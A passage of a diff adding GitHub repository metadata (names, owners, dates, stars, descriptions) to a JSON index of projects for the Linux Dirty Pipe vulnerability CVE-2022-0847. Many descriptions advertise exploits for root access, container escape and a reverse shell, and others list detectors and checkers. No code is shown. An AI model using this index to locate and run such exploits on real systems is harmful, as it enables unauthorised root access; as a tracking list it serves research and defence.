"https:\/\/github.com\/DanaEpp\/pwncat_dirtypipe", + "description": "pwncat module that automatically exploits CVE-2022-0847 (dirtypipe)", + "fork": false, + "created_at": "2022-03-20T23:02:43Z", + "updated_at": "2022-10-17T04:59:19Z", + "pushed_at": "2022-03-21T19:28:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, { "id": 472598995, "name": "CVE-2022-0847", @@ -253,6 +1535,104 @@ "score": 0, "subscribers_count": 2 }, + { + "id": 476289719, + "name": "dirty-pipe", + "full_name": "scopion\/dirty-pipe", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/dirty-pipe", + "description": "Exploit for Dirty-Pipe (CVE-2022-0847) ", + "fork": false, + "created_at": "2022-03-31T12:10:52Z", + "updated_at": "2023-06-19T02:24:44Z", + "pushed_at": "2022-03-31T11:48:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476590347, + "name": "Debugging_Dirty_Pipe_CVE-2022-0847", + "full_name": "stfnw\/Debugging_Dirty_Pipe_CVE-2022-0847", + "owner": { + "login": "stfnw", + "id": 28357058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28357058?v=4", + "html_url": "https:\/\/github.com\/stfnw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stfnw\/Debugging_Dirty_Pipe_CVE-2022-0847", + "description": "Presentation slides and supplementary material", + "fork": false, + "created_at": "2022-04-01T05:51:27Z", + "updated_at": "2022-04-01T06:08:57Z", + "pushed_at": "2022-04-01T05:53:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477067906, + "name": "dirtypipe", + "full_name": "drapl0n\/dirtypipe", + "owner": { + "login": "drapl0n", + "id": 87269662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87269662?v=4", + "html_url": "https:\/\/github.com\/drapl0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drapl0n\/dirtypipe", + "description": "DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root.", + "fork": false, + "created_at": "2022-04-02T13:49:03Z", + "updated_at": "2024-08-12T20:22:05Z", + "pushed_at": "2022-04-02T13:50:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash-bunny", + "cve-2022-0847", + "hak5", + "payload" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, { "id": 478388812, "name": "dirtypipe", @@ -576,5 +1956,977 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 510629189, + "name": "dirtypipe-ebpf_detection", + "full_name": "airbus-cert\/dirtypipe-ebpf_detection", + "owner": { + "login": "airbus-cert", + "id": 26453405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26453405?v=4", + "html_url": "https:\/\/github.com\/airbus-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/airbus-cert\/dirtypipe-ebpf_detection", + "description": "An eBPF detection program for CVE-2022-0847", + "fork": false, + "created_at": "2022-07-05T07:20:59Z", + "updated_at": "2024-12-16T13:13:20Z", + "pushed_at": "2022-07-05T14:25:46Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 28, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 510867863, + "name": "Dirty-Pipe", + "full_name": "edr1412\/Dirty-Pipe", + "owner": { + "login": "edr1412", + "id": 40953911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40953911?v=4", + "html_url": "https:\/\/github.com\/edr1412", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edr1412\/Dirty-Pipe", + "description": "exp of CVE-2022-0847", + "fork": false, + "created_at": "2022-07-05T19:22:50Z", + "updated_at": "2024-08-12T20:24:46Z", + "pushed_at": "2022-07-05T19:23:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520138171, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "eduquintanilha\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "eduquintanilha", + "id": 14018253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14018253?v=4", + "html_url": "https:\/\/github.com\/eduquintanilha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eduquintanilha\/CVE-2022-0847-DirtyPipe-Exploits", + "description": "COMPILED", + "fork": false, + "created_at": "2022-08-01T14:14:40Z", + "updated_at": "2022-08-02T13:18:25Z", + "pushed_at": "2022-08-02T15:11:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524458017, + "name": "CVE-2022-0847", + "full_name": "EagleTube\/CVE-2022-0847", + "owner": { + "login": "EagleTube", + "id": 87413459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87413459?v=4", + "html_url": "https:\/\/github.com\/EagleTube", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EagleTube\/CVE-2022-0847", + "description": "Modified dirtypipe script into auto root without have to search a file manually to hijack suid binary.", + "fork": false, + "created_at": "2022-08-13T16:58:40Z", + "updated_at": "2023-01-11T09:18:06Z", + "pushed_at": "2022-08-14T07:48:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 526035445, + "name": "CVE-2022-0847-Container-Escape", + "full_name": "yoeelingBin\/CVE-2022-0847-Container-Escape", + "owner": { + "login": "yoeelingBin", + "id": 57822313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57822313?v=4", + "html_url": "https:\/\/github.com\/yoeelingBin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoeelingBin\/CVE-2022-0847-Container-Escape", + "description": "CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸", + "fork": false, + "created_at": "2022-08-18T03:06:15Z", + "updated_at": "2024-03-12T02:21:27Z", + "pushed_at": "2022-08-22T03:37:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531290655, + "name": "dpipe", + "full_name": "notl0cal\/dpipe", + "owner": { + "login": "notl0cal", + "id": 24575356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24575356?v=4", + "html_url": "https:\/\/github.com\/notl0cal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notl0cal\/dpipe", + "description": "Proof-of-concept exploit for the Dirty Pipe vulnerability (CVE-2022-0847)", + "fork": false, + "created_at": "2022-08-31T23:19:28Z", + "updated_at": "2022-08-31T23:24:51Z", + "pushed_at": "2022-08-31T23:25:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 535409119, + "name": "Dirty-Pipe-Exploits", + "full_name": "Gustavo-Nogueira\/Dirty-Pipe-Exploits", + "owner": { + "login": "Gustavo-Nogueira", + "id": 36088551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36088551?v=4", + "html_url": "https:\/\/github.com\/Gustavo-Nogueira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gustavo-Nogueira\/Dirty-Pipe-Exploits", + "description": "CVE-2022-0847(Dirty Pipe) vulnerability exploits.", + "fork": false, + "created_at": "2022-09-11T19:50:53Z", + "updated_at": "2022-12-01T05:36:55Z", + "pushed_at": "2022-09-26T14:06:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 549750916, + "name": "Dirty-Pipe-Oneshot", + "full_name": "b4dboy17\/Dirty-Pipe-Oneshot", + "owner": { + "login": "b4dboy17", + "id": 83988282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83988282?v=4", + "html_url": "https:\/\/github.com\/b4dboy17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b4dboy17\/Dirty-Pipe-Oneshot", + "description": "Compled version of CVE-2022-0847 aka Dirty Pipe. Just one shot to root them all :D", + "fork": false, + "created_at": "2022-10-11T17:17:48Z", + "updated_at": "2022-10-12T05:02:04Z", + "pushed_at": "2022-10-11T17:42:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 550418551, + "name": "CVE-2022-0847-DirtyPipe-", + "full_name": "edsonjt81\/CVE-2022-0847-DirtyPipe-", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2022-0847-DirtyPipe-", + "description": null, + "fork": false, + "created_at": "2022-10-12T18:26:55Z", + "updated_at": "2022-10-12T18:27:13Z", + "pushed_at": "2022-10-12T18:27:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 566904700, + "name": "ps-lab-cve-2022-0847", + "full_name": "Turzum\/ps-lab-cve-2022-0847", + "owner": { + "login": "Turzum", + "id": 103773518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103773518?v=4", + "html_url": "https:\/\/github.com\/Turzum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Turzum\/ps-lab-cve-2022-0847", + "description": "Resources required for building Pluralsight CVE-2022-0847 lab", + "fork": false, + "created_at": "2022-11-16T16:57:14Z", + "updated_at": "2023-01-19T21:51:23Z", + "pushed_at": "2023-01-19T21:27:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 568592373, + "name": "linux-", + "full_name": "qwert419\/linux-", + "owner": { + "login": "qwert419", + "id": 70561497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70561497?v=4", + "html_url": "https:\/\/github.com\/qwert419", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qwert419\/linux-", + "description": "修改版CVE-2022-0847", + "fork": false, + "created_at": "2022-11-21T01:21:35Z", + "updated_at": "2024-05-15T06:21:19Z", + "pushed_at": "2022-11-21T01:24:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 580862925, + "name": "CVE-2022-0847", + "full_name": "DataFox\/CVE-2022-0847", + "owner": { + "login": "DataFox", + "id": 28943022, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28943022?v=4", + "html_url": "https:\/\/github.com\/DataFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DataFox\/CVE-2022-0847", + "description": "CVE-2022-0847", + "fork": false, + "created_at": "2022-12-21T16:34:18Z", + "updated_at": "2022-12-21T16:56:38Z", + "pushed_at": "2022-12-21T16:56:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 583717581, + "name": "Dirty-Pipe-CVE-2022-0847", + "full_name": "pmihsan\/Dirty-Pipe-CVE-2022-0847", + "owner": { + "login": "pmihsan", + "id": 89512452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89512452?v=4", + "html_url": "https:\/\/github.com\/pmihsan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pmihsan\/Dirty-Pipe-CVE-2022-0847", + "description": "Dirty Pipe Kernel Vulnerability Exploit", + "fork": false, + "created_at": "2022-12-30T17:17:44Z", + "updated_at": "2023-07-24T10:30:49Z", + "pushed_at": "2022-12-30T17:33:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "cve-2022-0847", + "dirty-pipe", + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 585137919, + "name": "Dirty-Pipe-CVE-2022-0847-POCs", + "full_name": "ajith737\/Dirty-Pipe-CVE-2022-0847-POCs", + "owner": { + "login": "ajith737", + "id": 72512571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72512571?v=4", + "html_url": "https:\/\/github.com\/ajith737", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajith737\/Dirty-Pipe-CVE-2022-0847-POCs", + "description": null, + "fork": false, + "created_at": "2023-01-04T12:17:12Z", + "updated_at": "2023-01-04T12:17:19Z", + "pushed_at": "2023-01-04T12:51:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592661297, + "name": "CVE-2022-0847", + "full_name": "mutur4\/CVE-2022-0847", + "owner": { + "login": "mutur4", + "id": 68686790, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68686790?v=4", + "html_url": "https:\/\/github.com\/mutur4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mutur4\/CVE-2022-0847", + "description": "Drity Pipe Linux Kernel 1-Day Exploit", + "fork": false, + "created_at": "2023-01-24T08:44:32Z", + "updated_at": "2024-02-10T19:14:45Z", + "pushed_at": "2023-09-06T12:28:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 606665321, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "orsuprasad\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "orsuprasad", + "id": 96675141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96675141?v=4", + "html_url": "https:\/\/github.com\/orsuprasad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orsuprasad\/CVE-2022-0847-DirtyPipe-Exploits", + "description": null, + "fork": false, + "created_at": "2023-02-26T07:08:36Z", + "updated_at": "2023-02-26T07:09:46Z", + "pushed_at": "2023-02-26T07:09:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 632960690, + "name": "CVE-2022-0847-container-escape", + "full_name": "JlSakuya\/CVE-2022-0847-container-escape", + "owner": { + "login": "JlSakuya", + "id": 43692131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43692131?v=4", + "html_url": "https:\/\/github.com\/JlSakuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JlSakuya\/CVE-2022-0847-container-escape", + "description": "A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.", + "fork": false, + "created_at": "2023-04-26T13:37:14Z", + "updated_at": "2023-04-29T08:25:41Z", + "pushed_at": "2023-04-26T13:38:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634694393, + "name": "cve-2022-0847", + "full_name": "jonathanbest7\/cve-2022-0847", + "owner": { + "login": "jonathanbest7", + "id": 91819614, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91819614?v=4", + "html_url": "https:\/\/github.com\/jonathanbest7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jonathanbest7\/cve-2022-0847", + "description": "check cve-2022-0847", + "fork": false, + "created_at": "2023-04-30T23:52:14Z", + "updated_at": "2023-04-30T23:52:15Z", + "pushed_at": "2023-04-30T23:52:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656422987, + "name": "dirty-pipe-poc", + "full_name": "0xeremus\/dirty-pipe-poc", + "owner": { + "login": "0xeremus", + "id": 115777776, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115777776?v=4", + "html_url": "https:\/\/github.com\/0xeremus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xeremus\/dirty-pipe-poc", + "description": "POC Exploit to add user to Sudo for CVE-2022-0847 Dirty Pipe Vulnerability", + "fork": false, + "created_at": "2023-06-20T23:48:24Z", + "updated_at": "2023-11-30T12:04:32Z", + "pushed_at": "2023-06-20T23:48:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662828842, + "name": "CVE-2022-0847-eBPF", + "full_name": "h4ckm310n\/CVE-2022-0847-eBPF", + "owner": { + "login": "h4ckm310n", + "id": 10968322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10968322?v=4", + "html_url": "https:\/\/github.com\/h4ckm310n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4ckm310n\/CVE-2022-0847-eBPF", + "description": "An eBPF program to detect attacks on CVE-2022-0847", + "fork": false, + "created_at": "2023-07-06T01:31:01Z", + "updated_at": "2024-07-03T22:01:24Z", + "pushed_at": "2023-11-04T15:49:51Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 664412775, + "name": "CVE-2022-0847-Exploit-Implementation", + "full_name": "joeymeech\/CVE-2022-0847-Exploit-Implementation", + "owner": { + "login": "joeymeech", + "id": 32067575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32067575?v=4", + "html_url": "https:\/\/github.com\/joeymeech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joeymeech\/CVE-2022-0847-Exploit-Implementation", + "description": "Using CVE-2022-0847, \"Dirty Pipe Exploit\", to pop a reverse bash shell for arbitrary code execution on a foreign machine.", + "fork": false, + "created_at": "2023-07-09T22:48:22Z", + "updated_at": "2024-06-21T10:50:51Z", + "pushed_at": "2023-07-11T02:02:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 692738777, + "name": "DirtyPipe", + "full_name": "pashayogi\/DirtyPipe", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/DirtyPipe", + "description": "CVE: CVE-2022-0847", + "fork": false, + "created_at": "2023-09-17T12:43:52Z", + "updated_at": "2024-07-16T13:10:31Z", + "pushed_at": "2023-09-17T12:44:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 705367804, + "name": "DirtyPipe", + "full_name": "n3rada\/DirtyPipe", + "owner": { + "login": "n3rada", + "id": 72791564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72791564?v=4", + "html_url": "https:\/\/github.com\/n3rada", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rada\/DirtyPipe", + "description": "Working Dirty Pipe (CVE-2022-0847) exploit tool with root access and file overwrites.", + "fork": false, + "created_at": "2023-10-15T20:13:11Z", + "updated_at": "2024-11-20T17:53:47Z", + "pushed_at": "2023-10-15T22:23:44Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0847", + "dirty-pipe", + "kernel-exploit", + "pentesting", + "unix" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709775288, + "name": "CVE-2022-0847-dirty-pipe-checker", + "full_name": "ayushx007\/CVE-2022-0847-dirty-pipe-checker", + "owner": { + "login": "ayushx007", + "id": 113995024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113995024?v=4", + "html_url": "https:\/\/github.com\/ayushx007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayushx007\/CVE-2022-0847-dirty-pipe-checker", + "description": "Bash script to check if kernel is vulnerable ", + "fork": false, + "created_at": "2023-10-25T11:28:22Z", + "updated_at": "2023-10-25T11:29:25Z", + "pushed_at": "2023-10-25T11:29:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714682173, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "ayushx007\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "ayushx007", + "id": 113995024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113995024?v=4", + "html_url": "https:\/\/github.com\/ayushx007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ayushx007\/CVE-2022-0847-DirtyPipe-Exploits", + "description": null, + "fork": false, + "created_at": "2023-11-05T15:34:54Z", + "updated_at": "2023-11-05T15:35:50Z", + "pushed_at": "2023-11-05T15:35:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736712600, + "name": "LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus", + "full_name": "solomon12354\/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus", + "owner": { + "login": "solomon12354", + "id": 84257391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84257391?v=4", + "html_url": "https:\/\/github.com\/solomon12354", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/solomon12354\/LockingGirl-----CVE-2022-0847-Dirty_Pipe_virus", + "description": null, + "fork": false, + "created_at": "2023-12-28T16:52:42Z", + "updated_at": "2024-07-13T01:50:03Z", + "pushed_at": "2024-05-27T16:41:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 757803327, + "name": "CVE-2022-0847", + "full_name": "letsr00t\/CVE-2022-0847", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2024-02-15T02:27:27Z", + "updated_at": "2024-02-15T02:28:36Z", + "pushed_at": "2024-02-15T02:28:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794413658, + "name": "CVE-2022-0847", + "full_name": "xsxtw\/CVE-2022-0847", + "owner": { + "login": "xsxtw", + "id": 168295718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168295718?v=4", + "html_url": "https:\/\/github.com\/xsxtw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsxtw\/CVE-2022-0847", + "description": null, + "fork": false, + "created_at": "2024-05-01T05:16:16Z", + "updated_at": "2024-05-01T05:18:06Z", + "pushed_at": "2024-05-01T05:18:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810324570, + "name": "CVE-2022-0847-dirty-pipe-checker", + "full_name": "muhammad1596\/CVE-2022-0847-dirty-pipe-checker", + "owner": { + "login": "muhammad1596", + "id": 68430129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430129?v=4", + "html_url": "https:\/\/github.com\/muhammad1596", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammad1596\/CVE-2022-0847-dirty-pipe-checker", + "description": null, + "fork": false, + "created_at": "2024-06-04T13:25:04Z", + "updated_at": "2024-06-04T16:18:38Z", + "pushed_at": "2024-06-04T16:07:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811402709, + "name": "CVE-2022-0847-DirtyPipe-Exploits", + "full_name": "muhammad1596\/CVE-2022-0847-DirtyPipe-Exploits", + "owner": { + "login": "muhammad1596", + "id": 68430129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430129?v=4", + "html_url": "https:\/\/github.com\/muhammad1596", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/muhammad1596\/CVE-2022-0847-DirtyPipe-Exploits", + "description": null, + "fork": false, + "created_at": "2024-06-06T14:27:41Z", + "updated_at": "2024-06-06T14:39:21Z", + "pushed_at": "2024-06-06T14:39:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + 